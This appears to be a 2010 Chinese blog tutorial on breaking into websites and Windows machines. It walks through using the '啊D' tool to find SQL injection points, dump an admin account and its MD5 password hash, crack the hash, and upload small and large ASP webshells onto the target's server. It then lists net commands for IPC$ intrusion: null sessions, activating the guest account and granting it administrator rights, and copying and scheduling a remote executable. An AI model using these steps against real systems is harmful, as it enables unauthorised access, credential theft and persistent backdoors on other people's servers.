工具篇 啊D

检测注入漏洞



先将下载好的正版无毒啊D注入工具打开,大体上先熟悉啊D的功能布局,如注意观察下图左侧的<注入检测>里的<SQL注入检测>、<浏览网页>、<相关工具>选项的功能等,下面会用到



在<检测网址>的栏内可以输入要注入的网址


点击<注入检测>里的<浏览网页>图标,即可浏览该网页


然后稍等片刻,如图下方就出现了红色的<可用注入点>URL,右击它,选择注入就行了





SQL注入



在下图所示的页面中,点击<检测表段>,检测完毕后在选中<admin>,再点击右侧的<检测字段>


等检测完毕后,在<admin>和<password>的前面选中方框


最后,点击右侧的检测内容



稍等一会儿,工具就会检测出类似下图所示的内容


双击<检测内容>中的编号2那一行,就会出现下图的<复制窗口>里的内容


这样,就知道了网站后台的一个账户是<admin>,<password>下面的内容为账户密码的MD5值


复制下来,找到在线MD5免费解密网站即可解密,解密成功后,就可以利用<管理入口检测>功能,找到网站后台,用得到的账户和密码登录了




目录浏览上传木马



如下图所示,先将啊D切换到<相关工具>选项下,然后点击<目录查看>,接着就可以点击<开始检测>


然后就如图所示,进入了对方的C盘下,可以找到对方的网站的绝对路径,就是网站的文件在C盘的哪个文件夹下


这里找到是在C盘web文件夹下



然后,点击下图的<CMD/上传>选项


在图下面的<文件上传><本地文件>选项下选择自己的asp木马存放的位置,然后在<目标位置>选择<c:\web\xiaoma.asp>,点击<上传>


稍等一会,文本框中出现<内容写入结束,祝您好运>字样,就上传小马成功了



最后就如下图,在浏览器中输入小马的网站相对位置,就可以打开传大马的界面了


 在图中分别输入要传的大马的绝对路径和大马源码,点击<save>,就完成了大马的上传。当遇到传不上去大马的时候,可以换个大马源码试试


================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ 2010/8/20
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值